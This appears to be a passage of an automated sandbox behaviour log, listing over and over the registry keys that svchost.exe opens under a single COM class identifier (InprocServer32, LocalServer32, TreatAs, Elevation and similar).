Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
